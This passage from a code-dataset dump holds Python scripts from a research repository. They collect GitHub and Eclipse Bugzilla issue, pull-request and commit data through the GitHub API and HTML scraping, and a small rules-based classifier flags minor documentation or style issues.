"text": "import json\nimport re\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\ndef get_author_pr(pr_url):\n\t# pr_url looks like '/flutter/flutter/pull/297'\n\tpr_url = pr_url.replace('pull', 'pulls')\n\tr = requests.get('https://api.github.com/repos' + pr_url, auth=HTTPBasicAuth('user', 'password')).json()\n\tif 'merged' not in r:\n\t\tprint(\"fail\")\n\t\treturn False\n\treturn r['merged'] and pr_url.startswith('/flutter')\n\nwith open('data/flutter/flutter_issues_prs_final_4.json') as json_data:\n issues_prs = json.load(json_data)\n\nfor issue_pr in issues_prs:\n\tmerged_prs = []\n\tfor pr in issue_pr['failed_prs']:\n\t\tif get_author_pr(pr['pull']):\n\t\t\tprint(issue_pr['issue_num'])\n\t\t\tprint(\"merged: \" + pr['pull'])\n\t\t\tmerged_prs.append(pr)\n\tfor pr in merged_prs:\n\t\tissue_pr['failed_prs'].remove(pr)\n\t\tissue_pr['merged_prs'].append(pr)\nwith open('data/flutter/flutter_issues_prs_final_5.json', 'w') as f:\n json.dump(issues_prs, f, indent=4)\n'''\nfor issue_pr in issues_prs:\n\tprint(issue_pr['issue_num'])\n\tremove_prs = []\n\tfor pr in issue_pr['merged_prs']:\n\t\tauthor, is_merged = get_author_pr(pr['pull'])\n\t\tif not pr['author']:\n\t\t\tpr['author'] = author\n\t\tif not is_merged:\n\t\t\tremove_prs.append(pr)\n\tfor pr in remove_prs:\n\t\tissue_pr['merged_prs'] = list(filter(lambda x: x != pr, issue_pr['merged_prs']))\n\t\tissue_pr['failed_prs'].append(pr)\n\tfor pr in issue_pr['failed_prs']:\n\t\tif not pr['author']:\n\t\t\tpr['author'] = get_author_pr(pr['pull'])[0]\n\tfor commit in issue_pr['master_commits']:\n\t\tif not commit['author']:\n\t\t\tprint(\"found unauthored commit \" + commit)\n\tfor commit in issue_pr['local_commits']:\n\t\tif not commit['author']:\n\t\t\tprint(\"found unauthored commit \" + commit)\n\nwith open('data/flutter/flutter_issues_prs_10.json', 'w') as f:\n json.dump(issues_prs, f, indent=4)\n '''"
},
{
"alpha_fraction": 0.6461020708084106,
"alphanum_fraction": 0.6662927865982056,
"avg_line_length": 32.03703689575195,
"blob_id": "27adc7cc7ef243a835b78628481d60e582229759",
"content_id": "44ca2a3ffd9336ddc6c710d405b22dccf09af852",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 54,
"path": "/src/pulls.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport os\nimport re\nimport requests\n\nfrom time import sleep\n\n\ndef get_pulls_query(repo, state):\n\t\"\"\" Returns list containing all pulls in the given repo with state \"\"\"\n\tissues = []\n\tdate = '2000-01-01'\n\t# Search API can only return 1000 results at a time, so need to break calls apart by time period\n\twhile True:\n\t\tr = requests.get('https://api.github.com/search/issues?q=%22%22+repo:%s+type:pr+state:%s+created:>%s&sort=created&order=asc' % (repo,state,date))\n\t\t# no more issues to collect, write to file and return\n\t\tif r.json()['total_count'] == 0:\n\t\t\treturn issues\n\t\tissues.extend(r.json()['items'])\n\t\tif 'Link' not in r.headers:\n\t\t\treturn issues\n\t\tnext_page, last_page = re.findall(r'\\<(.*?)\\>', r.headers['Link'])\n\t\tpage = 2\n\t\twhile next_page != last_page:\n\t\t\t# sleep for a minute every 9 pages to avoid rate limiting\n\t\t\tif page % 9 == 0:\n\t\t\t\tsleep(60)\n\t\t\tr = requests.get(next_page)\n\t\t\tissues.extend(r.json()['items'])\n\t\t\t_, next_page, _ , _ = re.findall(r'\\<(.*?)\\>', r.headers['Link'])\n\t\t\tpage += 1\n\t\tr = requests.get(last_page)\n\t\tissues.extend(r.json()['items'])\n\t\tdate = issues[-1]['created_at'][:10]\n\t\t# sleep before next iteration to avoid rate limiting\n\t\tsleep(60)\n\n\ndef get_comments_for_pulls(prs):\n\tfor pr in prs[2500:]:\n\t\tcomments = requests.get(pr['comments_url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\t\tpr['comments'] = comments\n\twith open('data/flutter/flutter_pulls_comments_2.json', 'w') as f:\n\t\tjson.dump(prs, f, indent=4)\n\n\n'''\nissues = get_pulls_query('flutter/flutter', 'closed')\nwith open('data/flutter/flutter_pulls_closed.json', 'w') as f:\n json.dump(issues, f, indent=4)\n'''\nwith open('data/flutter/flutter_pulls_closed.json') as json_data:\n prs = json.load(json_data)\nget_comments_for_pulls(prs)"
},
{
"alpha_fraction": 0.7123016119003296,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 37.69230651855469,
"blob_id": "9436fc795d4259823261816d78422bf5c48f66bc",
"content_id": "a70cd591f8c371a0022b786211cd1d1f61078dd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 13,
"path": "/src/local_commits.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nwith open('data/flutter/flutter_issues_prs_temp.json') as json_data:\n\tissues_prs = json.load(json_data)\nfor issue_pr in issues_prs:\n\tremove_commits = []\n\tfor commit in issue_pr['local_commits']:\n\t\tif commit['author'] not in commit['commit']:\n\t\t\tissue_pr['master_commits'].append(commit)\n\t\t\tremove_commits.append(commit)\n\tfor commit in remove_commits:\n\t\tissue_pr['local_commits'].remove(commit)\nwith open('data/flutter/issues_prs_temp.json', 'w') as f:\n json.dump(issues_prs, f, indent=4)\n\n"
},
{
"alpha_fraction": 0.6396371126174927,
"alphanum_fraction": 0.660334587097168,
"avg_line_length": 32.599998474121094,
"blob_id": "3177c93df6ccb3b07a310eda4dd82c8c1c178963",
"content_id": "9e70a7d792d708e281070077654846d173022e81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3527,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 105,
"path": "/src/issue_scraper.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n \nissues = []\nfor issue_num in range(10000,13246):\n\tif issue_num % 100 == 0:\n\t\ttime.sleep(30)\n\tprint(\"getting issue: #\" + str(issue_num))\n\tissue_url = 'https://github.com/facebook/react/issues/' + str(issue_num)\n\troot = \"/facebook/react\"\n\tfor i in range(0,10):\n\t\ttry:\n\t\t\tpage = requests.get(issue_url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'}).text\n\t\texcept:\n\t\t\tprint(\"connection failed\")\n\t\t\ttime.sleep(60)\n\t\t\tcontinue\n\t\tbreak\n\tsoup = BeautifulSoup(page, 'html.parser')\n\t# looking at a PR and not an issue\n\tif soup.select(\".pull-request-tab-content\"):\n\t\tcontinue\n\t# get all immediate children\n\t#timeline = soup.select(\".js-timeline-item\")[0].findChildren(recursive=False)\n\ttimeline = soup.select(\".discussion-item\")\n\tmerged_prs = []\n\tfailed_prs = []\n\tmaster_commits = []\n\tlocal_commits = []\n\tfor event in timeline:\n\t\t# break if this is where the issue is closed\n\t\tif len(event.get('class')) > 1 and event.get('class')[1] == 'discussion-item-closed':\n\t\t\tbreak\n\t\t# get any commits for the issue\n\t\tif len(event.get('class')) > 1 and event.get('class')[1] == 'discussion-commits':\n\t\t\tif len(event.select(\".message\")) == 0:\n\t\t\t\tcontinue\n\t\t\tcommit = event.select(\".message\")[0]['href']\n\t\t\tauthor = event.select(\".author\")[0].text\n\t\t\td = {\"commit\": commit, \"author\":author}\n\t\t\tif root in commit:\n\t\t\t\tmaster_commits.append(d)\n\t\t\telse:\n\t\t\t\tlocal_commits.append(d)\n\t\t# get any prs for the issue\n\t\ttitle = event.select(\".discussion-item-ref-title\")\n\t\tif len(title) != 0:\n\t\t\ttitle = title[0].select(\"a\")[0]['href']\n\t\telse:\n\t\t\ttitle = \"\"\n\t\tif \"pull\" in title:\n\t\t\tauthor = event.select(\".author\")\n\t\t\t#TODO: need to handle Null authors after\n\t\t\tif author:\n\t\t\t\tauthor = author[0].text\n\t\t\telse:\n\t\t\t\tauthor = None\n\t\t\td = {\"pull\": title, \"author\": author}\n\t\t\tstate = event.select(\".State\")[0].text.strip()\n\t\t\tif state == \"Merged\":\n\t\t\t\tmerged_prs.append(d)\n\t\t\telse:\n\t\t\t\tfailed_prs.append(d)\n\t# try to find PRs from comments on the issue\n\tcomments = soup.select(\".js-comment-container\")\n\tcomment_links = []\n\tfor comment in comments:\n\t\tcomment_links.extend(comment.select(\".issue-link\"))\n\tfor link in comment_links:\n\t\tlink = link['href'].replace(\"https://github.com\", \"\")\n\t\tif \"pull\" in link and link not in merged_prs:\n\t\t\td = {\"pull\":link, \"author\":None}\n\t\t\tmerged_prs.append(d)\n\t# looking at a PR and not an issue\n\tif soup.select(\".pull-request-tab-content\") or len(soup.select(\".discussion-item-closed\")) == 0:\n\t\tcontinue\n\t# get all immediate children\n\tif len(soup.select(\".discussion-item-closed\")) == 0:\n\t\tprint(\"closing\")\n\t\tcontinue\n\tclosed = soup.select(\".discussion-item-closed\")[0]\n\tif len(closed.select(\".author\")) == 0 or not closed.select(\".author\")[0].has_attr('href'):\n\t\tprint(\"closing2\")\n\t\tcontinue\n\tauthor = closed.select(\".author\")[0]['href']\n\tclosed_text = closed.text.replace(\" \", \"\").replace(\"\\n\", \"\")\n\tif \"closedthisin\" in closed_text:\n\t\tif len(closed.select(\"code\")) > 0:\n\t\t\tclosing_commit = closed.select(\"code\")[0].select(\"a\")[0]['href']\n\t\t\td = {}\n\t\t\td['commit'] = closing_commit\n\t\t\td['author'] = author\n\t\t\tmaster_commits.append(d)\n\tissue = {}\n\tissue['issue_num'] = issue_num\n\tissue['merged_prs'] = merged_prs\n\tissue['failed_prs'] = failed_prs\n\tissue['master_commits'] = master_commits\n\tissue['local_commits'] = local_commits\n\tissues.append(issue)\nwith open('data/react/issues_prs_3.json', 'w') as f:\n json.dump(issues, f, indent=4)\nprint(issues)"
},
{
"alpha_fraction": 0.6500508785247803,
"alphanum_fraction": 0.6829433441162109,
"avg_line_length": 35.875,
"blob_id": "f298c756602bab828706e8f84d13bc30513d17a0",
"content_id": "8cc5480f5502a2b505fcd37aec7d2120c83528d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2949,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 80,
"path": "/src/bugs.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport time\nfrom bs4 import BeautifulSoup\n#from urllib.request import urlopen\nimport requests\n\nissues = []\nfor bug_id in range(425000,450000):\n\tprint(\"getting issue: #\" + str(bug_id))\n\tbug_url = 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=' + str(bug_id)\n\tfor i in range(0,10):\n\t\ttry:\n\t\t\tpage = requests.get(bug_url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'}).text\n\t\texcept:\n\t\t\tprint(\"connection failed\")\n\t\t\ttime.sleep(60)\n\t\t\tcontinue\n\t\tbreak\n\tsoup = BeautifulSoup(page, 'html.parser')\t\n\tshort_desc = soup.select(\"#short_desc_nonedit_display\")\n\t# if not a valid bug, move onto the next\n\tif not short_desc:\n\t\tcontinue\n\tshort_desc = short_desc[0].text\n\tlong_desc = soup.select(\".bz_first_comment\")[0].select(\".bz_comment_text\")[0].text\n\tstatus = soup.select(\"#static_bug_status\")[0].text\n\tproduct = soup.select(\"#field_container_product\")[0].text\n\tcomponent = soup.select(\"#field_container_component\")[0].text\n\tduplicates = []\n\tduplicates_div = soup.select(\"#duplicates\")\n\tif duplicates_div:\n\t\tfor duplicate in duplicates_div[0].select(\"a\"):\n\t\t\tduplicates.append(duplicate.text)\n\t#TODO: select only the date/time here\n\tcreated_at = soup.select(\"#bz_show_bug_column_2\")[0].select(\"td\")[0].text\n\n\t# scrape the page with the updates, need to find who marked as fixed and when\n\tbug_history_url = 'https://bugs.eclipse.org/bugs/show_activity.cgi?id=' + str(bug_id)\n\tfor i in range(0,10):\n\t try:\n\t page = requests.get(bug_history_url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'}).text\n\t except:\n\t \tprint(\"connection failed\")\n\t \ttime.sleep(60)\n\t \tcontinue\n\t break\n\tsoup = BeautifulSoup(page, 'html.parser')\t\n\tdata = []\n\ttable = soup.find('table', attrs={'id':'bug_activity'})\n\tif not table:\n\t\tcontinue\n\ttable_body = table.find('tbody')\n\trows = table.find_all('tr')\n\tfor row in rows:\n\t\tcols = row.find_all('td')\n\t\tcols = [ele.text.strip() for ele in cols]\n\t\tdata.append([ele for ele in cols if ele]) # Get rid of empty values\n\t#TODO: Two possible ways for the bug to be marked done (make sure this works)\n\tcompleted_by = None\n\tcompleted_time = None\n\tfor idx, row in enumerate(data):\n\t\tif len(row) > 4 and row[4] == 'RESOLVED' and (idx + 1) < len(data) and len(data[idx+1]) > 2 and data[idx+1][2] == 'FIXED':\n\t\t\tcompleted_by = row[0]\n\t\t\tcompleted_time = row[1]\n\t\t\tbreak\n\n\tissue = {}\n\tissue['issue_id'] = bug_id\n\tissue['short_desc'] = short_desc\n\tissue['long_desc'] = long_desc\n\tissue['component'] = component\n\tissue['product'] = product\n\tissue['duplicates'] = duplicates\n\tissue['completed_by'] = completed_by\n\tissue['completed_at'] = completed_time\n\tissue['created_at'] = created_at\n\tissues.append(issue)\nprint(issues)\nwith open('data/eclipse/eclpise_issues17.json', 'w') as f:\n json.dump(issues, f, indent=4)"
},
{
"alpha_fraction": 0.6921513080596924,
"alphanum_fraction": 0.6974380016326904,
"avg_line_length": 32.684932708740234,
"blob_id": "d59d46a58b693742ead0a81e6c69974a8529779d",
"content_id": "ececa17f6e72b7f6a731a028e30172246afe3c1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2459,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 73,
"path": "/src/classifier.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "'''\n\nGoal: Build a simple, rules-based classifier that identifies issues that are small, stylistic changes as opposed to larger, more signficant\nalgorithm or code changes.\n\n'''\n\ndef preprocess_issue(issue):\n\t\"\"\" Remove code from issue templates and any other pre-processing that needs done \"\"\"\n\ttemplates = []\n\tissue_body = issue['body']\n\tif not issue_body:\n\t\treturn issue\n\tfor template in templates:\n\t\tissue_body = issue_body.replace(template, '')\n\tissue_body = issue_body.replace('\\r', '')\n\tissue_body = issue_body.replace('\\n', '')\n\tissue['body'] = issue_body.lower()\n\tissue['title'] = issue['title'].lower()\n\treturn issue\n\nissue_types = {\"refactor\": 0, \"readme\":0, \"doc\":0, \"easy\":0, \"typo\":0, \"deprecated\":0}\ndef classify_issues(issues):\n\tlabels = [classify_issue(preprocess_issue(issue)) for issue in issues]\t\n\tprint(issue_types)\n\tfor key in issue_types:\n\t\tissue_types[key] = 0\n\treturn labels\n\ndef classify_issue(issue):\n\t\"\"\" returns true if the given issue is a small style/documentation change \"\"\"\n\tif not issue['title'] or not issue['body']:\n\t\treturn False\n\treturn (is_readme_change(issue) or is_documentation_change(issue) or is_labeled_easy(issue) or is_refactor_change(issue) or is_typo_change(issue) or is_deprecated_change(issue))\n\ndef is_refactor_change(issue):\n\tif \"refactor\" in issue['title']:\n\t\tissue_types[\"refactor\"] += 1\n\t\treturn True\n\treturn False\n\ndef is_readme_change(issue):\n\tif \"readme\" in issue['title'] or \"readme\" in issue['body'] or \".md\" in issue['title'] or \".md\" in issue['body']:\n\t\tissue_types[\"readme\"] += 1\n\t\treturn True\n\treturn False\n\ndef is_documentation_change(issue):\n\tif \"documentation\" in issue['title'] or \"documentation\" in issue['body'] or \"doc\" in issue['title'] or \"link\" in issue['title']:\n\t\tissue_types[\"doc\"] += 1\n\t\treturn True\n\treturn False\n\ndef is_labeled_easy(issue):\n\t\"\"\" return true if the issue has a label indicating it is a beginner friendly issue\n\t\t(e.g. \"good first issue\" or \"Difficulty starter). Note these labels are repository-specific \"\"\"\n\tfor label in issue['labels']:\n\t\tif \"first issue\" in label['name'] or \"starter\" in label['name'] or \"easy\" in label['name']:\n\t\t\tissue_types[\"easy\"] += 1\n\t\t\treturn True\n\treturn False\n\ndef is_typo_change(issue):\n\tif \"typo\" in issue['title'] or \"typo\" in issue['body']:\n\t\tissue_types[\"typo\"] += 1\n\t\treturn True;\n\treturn False\n\ndef is_deprecated_change(issue):\n\tif \"deprecated\" in issue['title']:\n\t\tissue_types[\"deprecated\"] += 1\n\t\treturn True\n\treturn False\n"
},
{
"alpha_fraction": 0.6433054208755493,
"alphanum_fraction": 0.6830543875694275,
"avg_line_length": 29.838708877563477,
"blob_id": "d0416a9cfe9399b653136b44a83ca6540f13798d",
"content_id": "414e9b0d43a3b424a1f41911b28694648b514c9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 31,
"path": "/src/commit_enricher.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\nwith open('data/flutter/flutter_issues_prs_final_3.json') as json_data:\n issues_prs = json.load(json_data)\n\nfor issue_pr in issues_prs:\n\tfor commit in issue_pr['master_commits']:\n\t\tprint(issue_pr['issue_num'])\n\t\tissue_url = 'https://github.com' + commit['commit']\n\t\tfor i in range(0,10):\n\t\t\ttry:\n\t\t\t\tpage = requests.get(issue_url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'}).text\n\t\t\texcept:\n\t\t\t\tprint(\"connection failed\")\n\t\t\t\ttime.sleep(60)\n\t\t\t\tcontinue\n\t\t\tbreak\n\t\tsoup = BeautifulSoup(page, 'html.parser')\n\t\tmeta = soup.select('.commit-meta')[0]\n\t\tlinks = meta.select('.flex-auto')[0].select('a')\n\t\tauthor = links[0].text\n\t\tprint(author)\n\t\tcommit['author'] = author\n\nwith open('data/flutter/flutter_issues_prs_final_4.json', 'w') as f:\n json.dump(issues_prs, f, indent=4)\n"
},
{
"alpha_fraction": 0.6407669186592102,
"alphanum_fraction": 0.657921314239502,
"avg_line_length": 31.508195877075195,
"blob_id": "2c0e1efd1947e9a8602fd14e891f08bc3f46d570",
"content_id": "2d4ff36025e920b474261a933b5579b6da0a84c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1982,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 61,
"path": "/src/commits.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport re\nimport requests\n\nfrom time import sleep\n\n\ndef get_commits_query(repo):\n\t\"\"\" Returns list containing all commits in the given repo \"\"\"\n\tcommits = []\n\tdate = '2000-01-01'\n\theaders = {\"Accept\":\"application/vnd.github.cloak-preview\"}\n\t# Search API can only return 1000 results at a time, so need to break calls apart by time period\n\twhile True:\n\t\tprint(date)\n\t\t# commit search API in preview/testing phase, must specify accept header to access\n\t\tr = requests.get('https://api.github.com/search/commits?q=%22%22+repo:%s+committer-date:>%s&sort=committer-date&order=asc' % (repo,date), headers=headers)\n\t\t# no more issues to collect, write to file and return\n\t\tif r.json()['total_count'] == 0:\n\t\t\treturn commits\n\t\tcommits.extend(r.json()['items'])\n\t\tif 'Link' not in r.headers:\n\t\t\treturn commits\n\t\tnext_page, last_page = re.findall(r'\\<(.*?)\\>', r.headers['Link'])\n\t\tprint(next_page)\n\t\tprint(last_page)\n\t\tpage = 2\n\t\twhile next_page != last_page:\n\t\t\t# sleep for a minute every 9 pages to avoid rate limiting\n\t\t\tif page % 9 == 0:\n\t\t\t\tsleep(60)\n\t\t\tr = requests.get(next_page, headers=headers)\n\t\t\tif (len(r.json()['items']) == 0):\n\t\t\t\tprint(\"retrying request\")\n\t\t\t\tpage += 1\n\t\t\t\tcontinue\n\t\t\tcommits.extend(r.json()['items'])\n\t\t\tif (len(re.findall(r'\\<(.*?)\\>', r.headers['Link'])) != 4):\n\t\t\t\tprint(\"retrying request\")\n\t\t\t\tpage += 1\n\t\t\t\tcontinue\n\t\t\t_, next_page, _ , _ = re.findall(r'\\<(.*?)\\>', r.headers['Link'])\n\t\t\tpage += 1\n\t\tr = requests.get(last_page, headers=headers)\n\t\tcommits.extend(r.json()['items'])\n\t\tdate = commits[-1]['commit']['committer']['date'][:10]\n\t\t# sleep before next iteration to avoid rate limiting\n\t\tsleep(60)\n\ncommits = get_commits_query(\"nodejs/node\")\nwith open('data/nodejs/nodejs_commits.json', 'w') as f:\n json.dump(commits, f, indent=4)\n\n\ndef get_commit_diff(commit_url):\n\t\"\"\" Get the diff for this commit\n\t\tTODO: find a better way to parse the diff\n\t\"\"\"\n\tdiff_url = commit_url + '.diff'\n\tresp = requests.get(diff_url)\n\treturn resp.text"
},
{
"alpha_fraction": 0.6442015767097473,
"alphanum_fraction": 0.6739526391029358,
"avg_line_length": 34.0638313293457,
"blob_id": "f2ebff0e55cf10bc0804675a33d378f7718cf338",
"content_id": "179ce8dccc462ae2e2c83a0b08a57c787d746b3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1647,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 47,
"path": "/src/final_commits.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n \nwith open('data/flutter/flutter_issues_prs.json') as json_data:\n issues_prs = json.load(json_data)\n\nfor issue_pr in issues_prs:\n\tprint(issue_pr['issue_num'])\n\tif issue_pr['issue_num'] % 300 == 0:\n\t\ttime.sleep(15)\n\tissue_url = 'https://github.com/flutter/flutter/issues/' + str(issue_pr['issue_num'])\n\troot = \"/flutter/flutter\"\n\tfor i in range(0,10):\n\t\ttry:\n\t\t\tpage = requests.get(issue_url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'}).text\n\t\texcept:\n\t\t\tprint(\"connection failed\")\n\t\t\ttime.sleep(60)\n\t\t\tcontinue\n\t\tbreak\n\tsoup = BeautifulSoup(page, 'html.parser')\n\t# looking at a PR and not an issue\n\tif soup.select(\".pull-request-tab-content\") or len(soup.select(\".discussion-item-closed\")) == 0:\n\t\tcontinue\n\t# get all immediate children\n\tif len(soup.select(\".discussion-item-closed\")) == 0:\n\t\tprint(\"closing\")\n\t\tcontinue\n\tclosed = soup.select(\".discussion-item-closed\")[0]\n\tif len(closed.select(\".author\")) == 0 or not closed.select(\".author\")[0].has_attr('href'):\n\t\tprint(\"closing2\")\n\t\tcontinue\n\tauthor = closed.select(\".author\")[0]['href']\n\tclosed_text = closed.text.replace(\" \", \"\").replace(\"\\n\", \"\")\n\tif \"closedthisin\" in closed_text:\n\t\tif len(closed.select(\"code\")) > 0:\n\t\t\tprint(closed_text)\n\t\t\tclosing_commit = closed.select(\"code\")[0].select(\"a\")[0]['href']\n\t\t\td = {}\n\t\t\td['commit'] = closing_commit\n\t\t\td['author'] = author\n\t\t\tissue_pr['master_commits'].append(d)\n\nwith open('data/flutter/issues_prs_temp.json', 'w') as f:\n json.dump(issues_prs, f, indent=4)"
},
{
"alpha_fraction": 0.6221914291381836,
"alphanum_fraction": 0.6330097317695618,
"avg_line_length": 34.70296859741211,
"blob_id": "16f22b0e7610459649fe7f352fc91e2cf7522ed3",
"content_id": "43125f2a85dc5fa3889b605d9b86142b97afe4d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3605,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 101,
"path": "/src/issues.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport re\nimport requests\n\nfrom time import sleep\n\n\ndef get_issues_query(repo, state):\n\t\"\"\" Returns list containing all issues in the given repo with state \"\"\"\n\tissues = []\n\tdate = '2000-01-01'\n\t# Search API can only return 1000 results at a time, so need to break calls apart by time period\n\twhile True:\n\t\tr = requests.get('https://api.github.com/search/issues?q=%22%22+repo:%s+type:issue+state:%s+created:>%s&sort=created&order=asc' % (repo,state,date))\n\t\t# no more issues to collect, write to file and return\n\t\tif r.json()['total_count'] == 0:\n\t\t\treturn issues\n\t\tissues.extend(r.json()['items'])\n\t\tif 'Link' not in r.headers:\n\t\t\treturn issues\n\t\tnext_page, last_page = re.findall(r'\\<(.*?)\\>', r.headers['Link'])\n\t\tpage = 2\n\t\twhile next_page != last_page:\n\t\t\t# sleep for a minute every 9 pages to avoid rate limiting\n\t\t\tif page % 9 == 0:\n\t\t\t\tsleep(60)\n\t\t\tr = requests.get(next_page)\n\t\t\tissues.extend(r.json()['items'])\n\t\t\t_, next_page, _ , _ = re.findall(r'\\<(.*?)\\>', r.headers['Link'])\n\t\t\tpage += 1\n\t\tr = requests.get(last_page)\n\t\tissues.extend(r.json()['items'])\n\t\tdate = issues[-1]['created_at'][:10]\n\t\t# sleep before next iteration to avoid rate limiting\n\t\tsleep(60)\n\ndef get_issue_by_id(issues, issue_id):\n\t\"\"\" get issue with the given issue_id \"\"\"\n\tfor issue in issues:\n\t\tif issue['id'] == issue_id:\n\t\t\treturn isssue\n\treturn None\n\ndef get_issue_by_title(issues, issue_title):\n\t\"\"\" get issue(s) with the given issue_id \"\"\"\n\treturn [issue for issue in issues if issue['title'] == issue_title]\n\ndef get_issue_by_label(issues, label_name):\n\t\"\"\" get all issues that are assigned the given label \"\"\" \n\treturn [issue for issue in issues if label_name in issue['labels']]\n\ndef get_word_freq_title(issues):\n\t\"\"\" get the word frequencies in the titles of issues \"\"\"\n\treturn get_word_freq(issues, 'title')\n\ndef get_word_freq_body(issues):\n\t\"\"\" get the word frequencies in the bodies of issues \"\"\"\n\treturn get_word_freq(issues, 'body')\n\ndef get_word_freq(issues, key):\n\t\"\"\" get the word frequencies in the 'key' field of issues \"\"\"\n\ttotal_words = 0\n\tword_freqs = {}\n\t#TODO: find a more comprehensive list of stop words\n\tstop_words = [\"in\", \"the\", \"or\", \"and\", \"for\", \"to\", \"not\", \"on\", \"and\", \"a\", \"of\", \"as\", \"an\", \"with\", \"when\", \"are\", \"-\", \"how\", \"from\", \"is\", \"does\", \"doesn't\",\n\t\t\t\t \"be\", \"if\", \"can\", \"so\", \"we\", \"you\", \"i\", \"have\", \"at\", \"but\", \"this\", \"that\", \"would\", \"should\", \"by\", \"can't\", \"it\", \"my\", \"its\", \"there\", \"was\",\n\t\t\t\t \"do\", \"use\", \"\", \"which\", \"some\", \"will\", \"what\", \"want\", \"our\", \"your\"]\n\tfor issue in issues:\n\t\t# remove non alphanumeric characters\n\t\tfor word in issue[key].split():\n\t\t\tword = re.sub(r'\\W+', '', word)\n\t\t\tif word not in stop_words:\n\t\t\t\tword_freqs[word] = word_freqs.get(word, 0) + 1\n\t\t\t\ttotal_words += 1\n\tfor word in word_freqs:\n\t\tword_freqs[word] /= total_words\n\treturn word_freqs\n\ndef get_code_in_issue(issue):\n\t\"\"\" Returns any (formatted) code that is present in the body of the issue \"\"\"\n\ts = issue['body']\n\tret = []\n\ttry:\n\t\twhile(True):\n\t\t\t# formatted code is enclosed in ``` ````\n\t\t\tstart = s.index(\"```\") + 3\n\t\t\tend = s.index(\"```\", start )\n\t\t\t# any valid HTML/JavaScript should have.\n\t\t\tif ('{' in s[start:end+3] or '<' in s[start:end+3]):\n\t\t\t\tret.append(s[start:end+3])\n\t\t\ts = s[end+3:]\n\texcept ValueError:\n\t\treturn ret\n\ndef get_num_code_lines(issue):\n\t\"\"\" Return the number of lines of (formatted) code in the body of an issue \"\"\"\n\treturn sum([len(s) for s in get_code_in_issue(issue)])\n\n#issues = get_issues_query('flutter/flutter', 'open')\n#with open('data/flutter/flutter_issues_open.json', 'w') as f:\n# json.dump(issues, f, indent=4)"
}
] | 12 |
Jorropo/py-libp2p | https://github.com/Jorropo/py-libp2p | dd005528ed5a10e96c812782d5efa7f6918181c6 | d0f47ef24f667410a11cc90492a66c428094410d | 8a1f876521be88d862a597a31d7ad4fa3a7a6311 | refs/heads/master | 2020-04-19T18:22:12.938044 | 2019-01-29T00:22:30 | 2019-01-29T00:22:30 | 168,361,894 | 0 | 0 | NOASSERTION | 2019-01-30T15:03:24 | 2019-01-30T15:03:27 | 2019-01-30T15:04:08 | Python | [
{
"alpha_fraction": 0.5722728371620178,
"alphanum_fraction": 0.5806451439857483,
"avg_line_length": 32.28688430786133,
"blob_id": "7fcc57526238fbfdd2304bb420e912b0617546a5",
"content_id": "26af6530dd585328308a1e8752dfc85177d43939",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4061,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 122,
"path": "/libp2p/network/multiaddr.py",
"repo_name": "Jorropo/py-libp2p",
"src_encoding": "UTF-8",
